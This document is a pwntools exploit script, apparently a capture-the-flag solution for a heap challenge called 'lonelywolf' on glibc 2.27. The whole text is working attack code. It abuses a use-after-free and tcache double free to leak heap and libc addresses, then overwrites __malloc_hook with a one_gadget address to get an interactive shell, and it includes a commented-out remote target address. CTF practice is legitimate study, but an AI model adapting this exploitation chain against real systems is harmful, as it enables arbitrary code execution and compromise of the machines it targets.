lonelywolf
from pwn import *
context.arch = 'amd64'
context.log_level='debug'
p=process('./pwn')
libc=ELF('./libc-2.27.so')
#p=remote('124.71.235.219',25196)
def add(idx,size):
p.recvuntil('Your choice: ')
p.sendline('1')
p.recvuntil('Index: ')
p.sendline(str(idx))
p.recvuntil('Size: ')
p.sendline(str(size))
def edit(idx,content):
p.recvuntil('Your choice: ')
p.sendline('2')
p.recvuntil('Index: ')
p.sendline(str(idx))
p.recvuntil('Content: ')
p.sendline(content)
def show(idx):
p.recvuntil('Your choice: ')
p.sendline('3')
p.recvuntil('Index: ')
p.sendline(str(idx))
def free(idx):
p.recvuntil('Your choice: ')
p.sendline('4')
p.recvuntil('Index: ')
p.sendline(str(idx))
add(0,0x78)
for i in range(2):
edit(0,'aaaaaaaa')
free(0)
show(0)
p.recvuntil('Content: ')
heap_base=u64(p.recv(6).ljust(8,b'\x00'))-0x260
log.success('heap_base :'+hex(heap_base))
payload=p64(0)*3+p64(0x451)
add(0,0x78)
edit(0,payload)
for i in range(10):
add(0,0x68)
free(0)
edit(0,b'p'*8)
free(0)
edit(0,p64(heap_base+0x280)+p64(0))
add(0,0x68)
add(0,0x68)
free(0)
show(0)
p.recvuntil('Content: ')
libc_base=u64(p.recvuntil('\x7f').ljust(8,b'\x00'))-96-0x10-libc.symbols['__malloc_hook']#0x3ebca0
log.success('libc_base:'+hex(libc_base))
malloc_hook=libc_base+libc.symbols['__malloc_hook']
add(0,0x70)
free(0)
edit(0,'p'*8)
free(0)
edit(0,p64(malloc_hook))
add(0,0x70)
add(0,0x70)
edit(0,p64(0x10a41c+libc_base))
#gdb.attach(p)
add(0,0x10)
p.interactive()
